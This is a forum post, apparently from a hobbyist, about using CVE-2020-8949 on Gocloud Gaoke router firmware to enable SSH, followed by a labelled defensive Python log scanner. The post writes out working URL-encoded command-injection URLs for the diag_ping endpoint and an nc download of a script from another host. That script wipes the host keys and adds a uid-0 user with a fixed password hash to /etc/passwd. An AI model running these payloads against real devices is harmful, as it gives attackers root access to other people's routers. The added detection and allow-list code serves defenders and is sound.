Mainly following "Gocloud Gaoke (高恪) firmware CVE-2020-8949 exploit to enable SSH" (the PoC passed testing on the latest 5.2).
Base package version: 4.0.2.12651
Feature package version: 5.2.0.19646 (the vulnerability is definitely present)
A few commands for the record:
- reboot
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60reboot%60/5/6/a.com
- nc 192.168.77.166 4444 > a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60nc%20192.168.1.166%204444%20%3E%20a.sh%60/5/6/a.com
- ls -l (two forms, same effect)
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60ls%20-l%60/5/6/a.com
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bls%20-l%202%3E%261%3B%20/5/6/a.com
- chmod +x a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60chmod%20%2Bx%20a.sh%60/5/6/a.com
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bchmod%20%2Bx%20a.sh%202%3E%261%3B%20/5/6/a.com
- sh a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bsh%20%20a.sh%202%3E%261%3B%20/5/6/a.com
Contents of a.sh (copied verbatim from the referenced article):
#!/bin/sh
# ls -l /etc/dropbear
# ls -l /etc/init.d
# ls -l /etc/rc.d
# cat /etc/init.d/dropbear
# cat /etc/init.d/rcS
echo "Generate host key"
rm -rf /etc/dropbear/dropbear_rsa_host_key
rm -rf /etc/dropbear/dropbear_dss_host_key
/usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
/usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
# echo "Exec /etc/init.d/dropbear"
# chmod +x /etc/init.d/dropbear
# /etc/init.d/dropbear enable
# /etc/init.d/dropbear start
echo "Check host key"
ls -l /etc/dropbear
date
echo "Add User sumu password admin"
cat>>/etc/passwd<<EOF
sumu:\$1\$aLBvC2Ao\$E4V2uG3GNwhlWczjZXb.31:0:0:root:/root:/bin/ash
EOF
echo "Update /etc/rc.local"
cat>/etc/rc.local<<EOF
# Put your custom commands here that should be executed once
# the system init finished. By default this file does nothing.
# /etc/init.d/dropbear start
/usr/sbin/dropbear
exit 0
EOF
echo "Check /etc/rc.local"
cat /etc/rc.local
echo "Start dropbear"
dropbear
After running the script I got the following output:
It starts going wrong from the "Check host key" step; the path seems to be wrong..
Would appreciate pointers from the experts.
For the latest 5.2.0.20018 the vulnerability doesn't seem to have been found yet...
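Added example, not part of the original post or the referenced article: the payload shapes quoted above all work by placing URL-encoded shell metacharacters (a backtick pair, or a leading `;`) into one of the positional segments of the diag_ping path. The script below shows both sides of that from a defender's point of view: a log scanner that decodes each path segment of diag_ping requests and flags any that carries shell metacharacters or is not a plausible interface name, and the allow-list check a fixed handler would apply to the four arguments before they are ever placed on a command line. The log lines, client address and timestamps are constructed for this example; the two injected paths are the encoded forms quoted in the post.

```python
"""Detect shell-metacharacter injection in diag_ping request paths (added example)."""
import re
from urllib.parse import unquote

# Constructed sample log lines in common log format. The two injected paths are
# the URL-encoded payload shapes quoted in the post; the timestamps and client
# address are made up for this example.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Mar/2021:10:00:01 +0800] "GET /cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0/5/6/a.com HTTP/1.1" 200 512',
    '192.168.1.50 - - [10/Mar/2021:10:00:05 +0800] "GET /cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60ls%20-l%60/5/6/a.com HTTP/1.1" 200 512',
    '192.168.1.50 - - [10/Mar/2021:10:00:09 +0800] "GET /cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bls%20-l%202%3E%261%3B%20/5/6/a.com HTTP/1.1" 200 512',
    '192.168.1.50 - - [10/Mar/2021:10:00:12 +0800] "GET /cgi-bin/webui/index HTTP/1.1" 200 100',
]

# Common log format: client, two dashes, [timestamp], "METHOD path PROTO", status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

DIAG_PING_PREFIX = "/cgi-bin/webui/admin/tools/app_ping/diag_ping/"

# Characters that terminate or nest a command once the value lands on a shell line.
SHELL_META_RE = re.compile(r'[`;|&\n\r]|\$\(')

# Strict allow-lists for the four positional arguments (interface, count, size, host).
# These patterns are this example's assumption about what the handler should accept.
IFACE_RE = re.compile(r'^[A-Za-z0-9_.:-]{1,15}$')
NUMBER_RE = re.compile(r'^[0-9]{1,4}$')
HOST_RE = re.compile(r'^[A-Za-z0-9.-]{1,253}$')


def is_valid_iface(value: str) -> bool:
    """True only for a plain interface name such as eth0 or br-lan."""
    return bool(IFACE_RE.match(value))


def validate_diag_ping_args(iface: str, count: str, size: str, host: str) -> bool:
    """Allow-list check a fixed handler would apply before building any command."""
    return (is_valid_iface(iface)
            and bool(NUMBER_RE.match(count))
            and bool(NUMBER_RE.match(size))
            and bool(HOST_RE.match(host)))


def parse_log_line(line: str):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def diag_ping_finding(line: str):
    """Return a finding dict for an injected diag_ping request, else None."""
    rec = parse_log_line(line)
    if rec is None or not rec["path"].startswith(DIAG_PING_PREFIX):
        return None
    # Split before decoding, as the server does, so an encoded '/' stays inside its segment.
    raw_segments = rec["path"][len(DIAG_PING_PREFIX):].split("/")
    for idx, raw in enumerate(raw_segments):
        decoded = unquote(raw)
        if SHELL_META_RE.search(decoded) or (idx == 0 and not is_valid_iface(decoded)):
            return {"src": rec["src"], "ts": rec["ts"], "segment": idx, "decoded": decoded}
    return None


def scan_log(lines):
    """Scan an iterable of log lines and collect the injection findings in order."""
    return [f for f in (diag_ping_finding(line) for line in lines) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} segment {f['segment']}: {f['decoded']!r}")
```

On the sample input the scanner reports the second and third lines and leaves the benign ping and the unrelated request alone. The check on the first segment is deliberately stricter than a metacharacter search, so a value such as a bare space is also flagged: an interface name that fails the allow-list has no legitimate reason to reach this endpoint, and the same allow-list is what a patched handler should enforce rather than trying to escape the input.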